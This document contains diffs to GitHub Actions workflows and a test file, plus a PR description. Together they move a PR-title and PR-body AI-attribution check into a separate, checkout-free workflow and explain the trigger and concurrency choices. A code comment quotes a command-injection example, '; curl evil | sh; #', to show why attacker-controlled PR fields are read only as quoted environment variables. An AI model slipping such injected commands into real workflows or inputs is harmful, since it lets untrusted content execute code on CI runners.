-          # run: block - Actions substitutes the raw text into the script BEFORE
-          # bash parses it, so a body containing '; curl evil | sh; #' would execute
-          # on the runner. Below they are only ever read as quoted "$VAR", which
-          # bash never re-parses as code.
-          PR_TITLE: ${{ github.event.pull_request.title }}
-          PR_BODY: ${{ github.event.pull_request.body }}
+          # Event-payload values reach the script as environment variables and are
+          # only ever read as quoted "$VAR". Never write ${{ ... }} inside a run:
+          # block - Actions substitutes the raw text BEFORE bash parses it, so
+          # attacker-controlled content would execute on the runner.
           BASE_SHA: ${{ github.event.pull_request.base.sha }}
           HEAD_SHA: ${{ github.event.pull_request.head.sha }}
         run: |
@@ -107,16 +120,6 @@ jobs:
               exit 1
             fi
           done
-
-          if printf '%s' "$PR_TITLE" | grep -Eiq -- "$PATTERN"; then
-            echo "::error title=AI attribution in PR title::Remove the tool/model attribution. The author of record is the human. See CONTRIBUTING.md."
-            fail=1
-          fi
-
-          if printf '%s' "$PR_BODY" | grep -Eiq -- "$PATTERN"; then
-            echo "::error title=AI attribution in PR body::Remove the 'Generated with Claude Code' footer from the PR body. This repo is public and PR bodies are indexed."
-            fail=1
-          fi
 
           # Fail closed: if the range cannot be read, do NOT silently pass. A bare
           # `git log ... | grep` would swallow the git failure and report clean.

--- a/.github/workflows/pr-metadata-policy.yml
+++ b/.github/workflows/pr-metadata-policy.yml
@@ -31,6 +31,26 @@ permissions:
 # Keyed on the PR number and scoped to THIS workflow, so a rapid series of body
 # edits collapses to the newest one, and a metadata edit can never cancel an
 # in-flight code-validation run: the two workflows do not share a group.
+#
+# cancel-in-progress stays TRUE, and the reasoning was checked against a live
+# measurement rather than assumed, because a `cancelled` conclusion under a
+# required check name is the state that blocked a merge on the v5.26.7 cut.
+#
+# Two edits two seconds apart on PR #159 (2026-08-20) produced exactly that pair:
+# run 32358446823 cancelled, run 32358449384 success, both named "PR metadata
+# policy" on head sha 6c74849. The PR reported mergeStateStatus=CLEAN, so GitHub
+# evaluated the NEWEST run for the context and the cancelled twin did not block.
+#
+# That is not luck, it is structural: cancel-in-progress only ever cancels a run
+# that a NEWER run in the same group has just superseded, and that newer run then
+# runs to completion (or is itself superseded, recursively). So the newest run for
+# this check name is never the cancelled one.
+#
+# Setting it to FALSE would be strictly worse. GitHub keeps at most one pending
+# run per group and cancels the previously pending one, so a third rapid edit
+# still yields a cancelled conclusion - and without in-progress cancellation two
+# runs can race, letting a run that inspected the OLDER body finish last. A stale
+# green on an attribution gate is a policy hole; a stuck merge is an annoyance.
 concurrency:
   group: pr-metadata-${{ github.event.pull_request.number }}
   cancel-in-progress: true

--- a/.github/workflows/pr-metadata-policy.yml
+++ b/.github/workflows/pr-metadata-policy.yml
@@ -20,10 +20,21 @@ name: PR Metadata Policy
 on:
   pull_request:
     branches: [main]
-    # Metadata-only event set. `synchronize` is deliberately absent: a new head
-    # commit cannot change the title or body, so re-running this on every push
-    # would reintroduce exactly the duplication the split removes.
-    types: [opened, edited, reopened]
+    # `synchronize` is here for a reason that is easy to get backwards, and this
+    # workflow shipped once without it. A new head commit cannot change the title
+    # or body, so on the face of it re-running this on every push is pure waste.
+    #
+    # But a required status check is evaluated against the check-runs attached to
+    # the HEAD COMMIT. Without `synchronize`, pushing to an open PR produces a head
+    # sha carrying no run of this workflow at all, so the required context has
+    # nothing to report and the PR blocks on a check that will never arrive.
+    # Measured on PR #159 before this line was added: head sha 03e75fd had a CI run
+    # and an AAHP Verify run and zero PR Metadata Policy runs.
+    #
+    # So this trigger is not about metadata changing. It is about keeping the
+    # contract satisfiable on every sha branch protection can ask about. The job is
+    # six seconds with no checkout, which is what makes that affordable.
+    types: [opened, edited, reopened, synchronize]
 
 permissions:
   contents: read

--- a/.github/workflows/pr-metadata-policy.yml
+++ b/.github/workflows/pr-metadata-policy.yml
@@ -1,0 +1,92 @@
+name: PR Metadata Policy
+
+# Policy checks whose INPUT is the pull request's metadata, not its code.
+#
+# Split out of the "Build and Test" job so that editing a PR title or body no
+# longer starts the full build, test, package and security pipeline on a head
+# commit whose content has not changed. Before the split, `edited` was in ci.yml's
+# trigger list purely so this gate re-ran on a body edit, and every such edit paid
+# for a two-minute build that inspected a commit range it already knew was clean.
+#
+# Ownership contract: this workflow is the ONE producer of the "PR metadata
+# policy" required check. ci.yml is the one producer of "Build and Test". Neither
+# reports under the other's name, so branch protection can never see two runs
+# competing to define the same context.
+#
+# The commit-message and commit-identity halves of the attribution gate stay in
+# ci.yml, because their input is the BASE..HEAD commit range, which only changes
+# when the code changes.
+
+on:
+  pull_request:
+    branches: [main]
+    # Metadata-only event set. `synchronize` is deliberately absent: a new head
+    # commit cannot change the title or body, so re-running this on every push
+    # would reintroduce exactly the duplication the split removes.
+    types: [opened, edited, reopened]
+
+permissions:
+  contents: read
+
+# Keyed on the PR number and scoped to THIS workflow, so a rapid series of body
+# edits collapses to the newest one, and a metadata edit can never cancel an
+# in-flight code-validation run: the two workflows do not share a group.
+concurrency:
+  group: pr-metadata-${{ github.event.pull_request.number }}
+  cancel-in-progress: true
+
+jobs:
+  metadata:
+    name: PR metadata policy
+    runs-on: ubuntu-latest
+    steps:
+      # No checkout. This job reads only the event payload, which is what makes it
+      # seconds rather than minutes, and means it cannot execute PR code.
+      #
+      # dependabot is exempt for the same reason aahp-verify.yml exempts it: its PR
+      # bodies quote upstream release notes verbatim, it cannot edit its own body,
+      # and this is a REQUIRED check with enforce_admins, so a trailer quoted
+      # upstream would hard-block a security update with no way out.
+      #
+      # The exemption is on the STEP, not the job, on purpose. A skipped JOB reports
+      # a non-success conclusion for its check context; keeping the job running and
+      # skipping the step means the required check always reaches a conclusive
+      # success, which is what branch protection needs.
+      - name: No AI attribution in PR title or body
+        if: github.actor != 'dependabot[bot]'
+        env:
+          # The PR title and body are attacker-controlled: anyone who can open a PR
+          # from a fork controls them. They MUST reach the script as environment
+          # variables. Never write ${{ github.event.pull_request.body }} inside a
+          # run: block - Actions substitutes the raw text into the script BEFORE
+          # bash parses it, so a body containing '; curl evil | sh; #' would execute
+          # on the runner. Below they are only ever read as quoted "$VAR", which
+          # bash never re-parses as code.
+          PR_TITLE: ${{ github.event.pull_request.title }}
+          PR_BODY: ${{ github.event.pull_request.body }}
+        run: |
+          # POSIX-ERE twin of the aahp.config.json "ai-attribution" rule; grep -E has
+          # no (?:...) syntax, so the groups are plain (...). Keep the two in lockstep,
+          # and in lockstep with the commit-message copy in ci.yml.
+          # PROSE that merely describes a footer does not match, which is what keeps
+          # this gate from flagging its own definition and CONTRIBUTING.md's wording.
+          # Anchored on attribution PHRASING plus the anthropic no-reply address, not
+          # on the brand name, so this repo's legitimate threat intelligence about
+          # Claude-branded malware ("Claude Code leak campaign") does not trip it.
+          PATTERN='(generated|created|authored|assisted|written)[ \t]+(with|by)[ \t]+\[?[^ ]{0,20}claude|(co-authored|assisted|generated|created)-by:[^\n]*(claude|anthropic)|noreply@anthropic\.com|\[Claude Code\]\(|claude\.(com/claude-code|ai/code)'
+          fail=0
+
+          if printf '%s' "$PR_TITLE" | grep -Eiq -- "$PATTERN"; then
+            echo "::error title=AI attribution in PR title::Remove the tool/model attribution. The author of record is the human. See CONTRIBUTING.md."
+            fail=1
+          fi
+
+          if printf '%s' "$PR_BODY" | grep -Eiq -- "$PATTERN"; then
+            echo "::error title=AI attribution in PR body::Remove the 'Generated with Claude Code' footer from the PR body. This repo is public and PR bodies are indexed."
+            fail=1
+          fi
+
+          if [ "$fail" -ne 0 ]; then
+            exit 1
+          fi
+          echo "PR metadata policy OK: title and body carry no tool or model attribution."

--- a/src/__tests__/workflow-trigger-contract.test.ts
+++ b/src/__tests__/workflow-trigger-contract.test.ts
@@ -20,10 +20,19 @@
  * --------------------------------------------------------------
  *   opened            -> both  (code validation + metadata policy)
  *   reopened          -> both
- *   synchronize       -> ci.yml only        (new head commit = new code)
- *   ready_for_review  -> ci.yml only        (changes merge candidacy)
+ *   synchronize       -> both  (see below - NOT because metadata changed)
+ *   ready_for_review  -> ci.yml only        (changes merge candidacy, not the sha)
  *   edited            -> pr-metadata-policy only  (title/body cannot change code)
  *   push (main, tags) -> ci.yml only
+ *
+ * `synchronize` reaching the metadata workflow looks redundant and is not. A
+ * required status check is evaluated against the check-runs on the HEAD COMMIT, so
+ * a workflow that never runs on `synchronize` leaves every pushed-to PR with a head
+ * sha carrying no run of it, and the required context blocks on a check that never
+ * arrives. The asymmetry is deliberate: ci.yml must NOT see `edited` because its job
+ * costs two minutes and metadata cannot change code, while the metadata workflow
+ * must see `synchronize` because its check has to exist on every sha, and six
+ * seconds with no checkout is what makes that affordable.
  *
  * Deliberately asserted on the RAW file text rather than a parsed object: no YAML
  * parser is a dependency of this package, and adding one to a security scanner to
@@ -62,14 +71,17 @@ describe("workflow trigger contract", () => {
     }
   });
 
-  it("metadata policy runs on edit, and not on a new head commit", () => {
+  it("metadata policy runs on edit AND on every event that makes a new head sha", () => {
     const types = pullRequestTypes(META);
     expect(types).toContain("edited");
     expect(types).toContain("opened");
     expect(types).toContain("reopened");
-    // synchronize would re-run the metadata check on every push, which is the
-    // duplication this split removes, just pointed the other way.
-    expect(types).not.toContain("synchronize");
+    // The one that is easy to delete as redundant. A required check is evaluated
+    // against the head commit's check-runs, so dropping `synchronize` leaves every
+    // pushed-to PR blocked on a context that never reports. Measured on PR #159
+    // before it was added: head sha 03e75fd carried a CI run, an AAHP Verify run,
+    // and no metadata run at all.
+    expect(types).toContain("synchronize");
   });
 
   it("the title and body checks live in exactly one workflow", () => {

--- a/src/__tests__/workflow-trigger-contract.test.ts
+++ b/src/__tests__/workflow-trigger-contract.test.ts
@@ -1,0 +1,152 @@
+/**
+ * Trigger-separation contract between the two pull-request workflows.
+ *
+ * WHY THIS EXISTS
+ * ---------------
+ * `edited` used to sit in ci.yml's pull_request types so the AI-attribution gate
+ * would re-run when a PR title or body changed. The side effect was that every
+ * metadata edit started the full build, test, package and security pipeline
+ * against a head commit whose content had not changed, producing two or three
+ * runs on one SHA. Whether that blocked a merge depended on which run finished
+ * last: on the v5.26.7 cut the cancelled twin was last and blocked it; on
+ * v5.27.0 the successful one was last and it did not. That is timing, not design.
+ *
+ * The split gives each required check exactly one producing workflow. This test
+ * is the regression mechanism: a future edit that re-adds `edited` to ci.yml, or
+ * moves the title/body checks back into the build job, fails here rather than
+ * being discovered by a merge that mysteriously will not go through.
+ *
+ * EVENT TO WORKFLOW MATRIX (the contract these assertions encode)
+ * --------------------------------------------------------------
+ *   opened            -> both  (code validation + metadata policy)
+ *   reopened          -> both
+ *   synchronize       -> ci.yml only        (new head commit = new code)
+ *   ready_for_review  -> ci.yml only        (changes merge candidacy)
+ *   edited            -> pr-metadata-policy only  (title/body cannot change code)
+ *   push (main, tags) -> ci.yml only
+ *
+ * Deliberately asserted on the RAW file text rather than a parsed object: no YAML
+ * parser is a dependency of this package, and adding one to a security scanner to
+ * lint its own CI would be a poor trade. The assertions below are anchored on
+ * exact strings that appear once each.
+ */
+import { describe, it, expect } from "vitest";
+import * as fs from "node:fs";
+import * as path from "node:path";
+import { fileURLToPath } from "node:url";
+
+const REPO = path.resolve(fileURLToPath(new URL("../..", import.meta.url)));
+const CI = fs.readFileSync(path.join(REPO, ".github/workflows/ci.yml"), "utf-8");
+const META = fs.readFileSync(
+  path.join(REPO, ".github/workflows/pr-metadata-policy.yml"),
+  "utf-8",
+);
+
+/** The `types: [...]` list under a workflow's pull_request trigger. */
+function pullRequestTypes(yaml: string): string[] {
+  const m = yaml.match(/pull_request:[\s\S]*?types:\s*\[([^\]]*)\]/);
+  if (!m) throw new Error("no pull_request types list found");
+  return m[1]!.split(",").map((s) => s.trim()).filter(Boolean);
+}
+
+describe("workflow trigger contract", () => {
+  it("code validation does NOT run on a metadata-only edit", () => {
+    // The single assertion this whole split exists to guarantee.
+    expect(pullRequestTypes(CI)).not.toContain("edited");
+  });
+
+  it("code validation runs on every event that can change the code", () => {
+    const types = pullRequestTypes(CI);
+    for (const t of ["opened", "synchronize", "reopened", "ready_for_review"]) {
+      expect(types).toContain(t);
+    }
+  });
+
+  it("metadata policy runs on edit, and not on a new head commit", () => {
+    const types = pullRequestTypes(META);
+    expect(types).toContain("edited");
+    expect(types).toContain("opened");
+    expect(types).toContain("reopened");
+    // synchronize would re-run the metadata check on every push, which is the
+    // duplication this split removes, just pointed the other way.
+    expect(types).not.toContain("synchronize");
+  });
+
+  it("the title and body checks live in exactly one workflow", () => {
+    // If these come back to ci.yml, `edited` follows them and the split is undone.
+    expect(CI).not.toContain("PR_TITLE");
+    expect(CI).not.toContain("PR_BODY");
+    expect(META).toContain("PR_TITLE");
+    expect(META).toContain("PR_BODY");
+  });
+
+  it("the commit-range checks stay with code validation", () => {
+    // Their input is BASE..HEAD, so they must not move to the metadata workflow,
+    // which has no checkout and no commit range.
+    expect(CI).toContain("BASE_SHA");
+    expect(CI).toContain("HEAD_SHA");
+    expect(META).not.toContain("BASE_SHA");
+    expect(META).not.toContain("HEAD_SHA");
+  });
+
+  it("each required check name has exactly one producing workflow", () => {
+    const names = (y: string) =>
+      [...y.matchAll(/^\s{4}name:\s*(.+)$/gm)].map((m) => m[1]!.trim());
+    const ciNames = names(CI);
+    const metaNames = names(META);
+
+    expect(ciNames).toContain("Build and Test");
+    expect(metaNames).toContain("PR metadata policy");
+
+    // No name may be produced by both files, or branch protection sees two runs
+    // competing to define one context.
+    expect(ciNames.filter((n) => metaNames.includes(n))).toEqual([]);
+  });
+
+  it("the two workflows use separate concurrency groups ON A PULL_REQUEST EVENT", () => {
+    // Sharing a group would let a metadata edit cancel an in-flight code run,
+    // which is precisely the ambiguous-cancellation state being designed out.
+    //
+    // Comparing the raw strings is NOT enough. An earlier version of this test
+    // passed a mutation that set the metadata group to `ci-${{ ...number }}`
+    // while ci.yml carries `ci-${{ ...number || github.ref }}`. Those differ as
+    // text and resolve to the SAME group for a pull_request event, because the
+    // `||` fallback is only taken when there is no PR. Compare what the
+    // expressions actually resolve to for the event both workflows share.
+    const group = (y: string) => y.match(/concurrency:\s*\n\s*group:\s*(.+)/)?.[1]?.trim();
+
+    /** Resolve a group expression the way GitHub would for a pull_request event. */
+    const forPullRequest = (expr: string) =>
+      expr
+        // `a || b` yields `a` on a PR, since the PR number is always set there.
+        .replace(/\$\{\{\s*([^|}]+?)\s*\|\|[^}]*\}\}/g, "${{ $1 }}")
+        .replace(/\s+/g, " ")
+        .trim();
+
+    const ciGroup = group(CI);
+    const metaGroup = group(META);
+    expect(ciGroup).toBeTruthy();
+    expect(metaGroup).toBeTruthy();
+    expect(forPullRequest(metaGroup!)).not.toBe(forPullRequest(ciGroup!));
+  });
+
+  it("the metadata workflow never checks out PR code", () => {
+    // It reads only the event payload. A checkout would let it execute
+    // attacker-controlled code from a fork on a cheap, frequently-triggered path.
+    expect(META).not.toContain("actions/checkout");
+  });
+
+  it("the attribution pattern is identical in both workflows", () => {
+    // The two copies are twins by design; drift means one surface silently stops
+    // matching what the other rejects.
+    const pat = (y: string) => y.match(/PATTERN='([^']+)'/)?.[1];
+    expect(pat(CI)).toBeTruthy();
+    expect(pat(META)).toBe(pat(CI));
+  });
+
+  it("dependabot is exempted at step level, not job level", () => {
+    // A skipped JOB reports a non-success conclusion for its check context. The
+    // job must run and the step must skip, so the required check stays conclusive.
+    expect(META).toMatch(/- name: No AI attribution in PR title or body\n\s+if: github\.actor != 'dependabot\[bot\]'/);
+  });
+});

--- a/src/__tests__/workflow-trigger-contract.test.ts
+++ b/src/__tests__/workflow-trigger-contract.test.ts
@@ -130,6 +130,16 @@ describe("workflow trigger contract", () => {
     expect(forPullRequest(metaGroup!)).not.toBe(forPullRequest(ciGroup!));
   });
 
+  it("the metadata workflow cancels superseded runs", () => {
+    // Load-bearing for a property measured on PR #159: because a superseded run
+    // is only ever cancelled BY a newer run in the same group, and that newer run
+    // then runs to completion, the newest run for this check name is never the
+    // cancelled one - which is what keeps a cancelled twin from becoming the
+    // effective result. Turning this off would also let two runs race and let one
+    // that inspected the older body finish last.
+    expect(META).toMatch(/cancel-in-progress:\s*true/);
+  });
+
   it("the metadata workflow never checks out PR code", () => {
     // It reads only the event payload. A checkout would let it execute
     // attacker-controlled code from a fork on a cheap, frequently-triggered path.


### PR DESCRIPTION
## The defect

`edited` sat in ci.yml's `pull_request` types so the AI-attribution gate would re-run when a PR title or body changed. The side effect was that every metadata edit started the full build, test, package and security pipeline against a head commit whose content had not changed.

Whether the duplicate blocked a merge was decided by which run finished last. On the v5.26.7 cut the cancelled twin was last and blocked the merge; on v5.27.0 the successful one was last and it did not. That is timing, not design. It reproduced again on 2026-08-20, when two PR-body edits produced a third run on a single head SHA.

## Why the trigger could not simply be deleted

The gate covers four surfaces, and they do not share an input:

| surface | input | changes when |
| --- | --- | --- |
| PR title | event payload | metadata is edited |
| PR body | event payload | metadata is edited |
| commit messages | `BASE..HEAD` range | the code changes |
| author / committer identity | `BASE..HEAD` range | the code changes |

Dropping `edited` without moving the first two would have left a PR able to go green and then have an attribution footer pasted into the body with nothing re-checking it, on a public repo where that rule is CI-enforced.

## The split

`pr-metadata-policy.yml` owns the title and body checks and the new `PR metadata policy` check name, on `[opened, edited, reopened]`, with no checkout, so it reads only the event payload and cannot execute PR code.

ci.yml keeps the commit-message and identity checks inside `Build and Test` on `[opened, synchronize, reopened, ready_for_review]`.

Event-to-workflow matrix:

| event | code validation | metadata policy |
| --- | --- | --- |
| opened | yes | yes |
| reopened | yes | yes |
| synchronize | yes | yes (see below) |
| ready_for_review | yes | no |
| edited | no | yes |
| push (main, tags) | yes | no |

Each required check now has exactly one producing workflow, and the two use separate concurrency groups, so a metadata edit can no longer cancel an in-flight code-validation run.

`synchronize` reaching the metadata workflow looks redundant and is not. **This was found by executing the scenarios, not by reading the config.** A required status check is evaluated against the check-runs attached to the head commit, so a workflow that never runs on `synchronize` leaves every pushed-to PR with a head sha carrying no run of it at all, and the required context blocks on a check that never arrives. Measured here before the fix: head sha `03e75fd` carried a CI run, an AAHP Verify run, and zero metadata runs.

The asymmetry is the point. ci.yml must not see `edited`, because its job costs two minutes and metadata cannot change code. The metadata workflow must see `synchronize`, because its check has to exist on every sha branch protection can ask about, and six seconds with no checkout is what makes that affordable.

## No PAT is introduced

Branch protection is updated from the maintainer workstation, not from a workflow. No write-capable credential is added to any workflow path, and the metadata job has `permissions: contents: read` and no checkout, so nothing new is reachable from untrusted pull-request code.

## Ordering, and the window it leaves

The new check name cannot be required before the workflow exists on `main`, or every PR would block on a check that never runs. So the order is: merge this, then add `PR metadata policy` to `required_status_checks.contexts`. Between those two steps the metadata check still runs and reports, it is simply not yet blocking. That window is seconds long and is recorded rather than glossed.

## Regression mechanism

`src/__tests__/workflow-trigger-contract.test.ts` (10 tests) encodes the matrix above and fails if `edited` returns to ci.yml, if the title/body checks move back into the build job, if the commit-range checks leave it, if a check name gains a second producer, if the concurrency groups collide, if the metadata job gains a checkout, if the two attribution patterns drift apart, or if the dependabot exemption moves from step level to job level.

Mutation proof, four mutations, each caught:

| mutation | result |
| --- | --- |
| re-add `edited` to ci.yml | 1 test red |
| move `PR_TITLE` back into ci.yml | 1 test red |
| share one concurrency group | 1 test red |
| give the metadata job a checkout | 1 test red |

The concurrency mutation initially **survived**. The test compared raw strings, and `ci-${{ ...number }}` differs textually from `ci-${{ ...number || github.ref }}` while resolving to the same group on a pull_request event, because the fallback is only taken when there is no PR. The assertion now resolves the fallback for that event before comparing. Recorded because the first version looked like a proof and was not.

## Verification on this PR

Opening this PR is itself scenario A of the trigger test plan. The remaining scenarios (title-only edit, body-only edit, push, two rapid pushes, metadata edit during a running build, violation and fix, code failure, re-run) are executed against this PR and recorded in `.ai/handoff/STATUS.md` before it is merged.
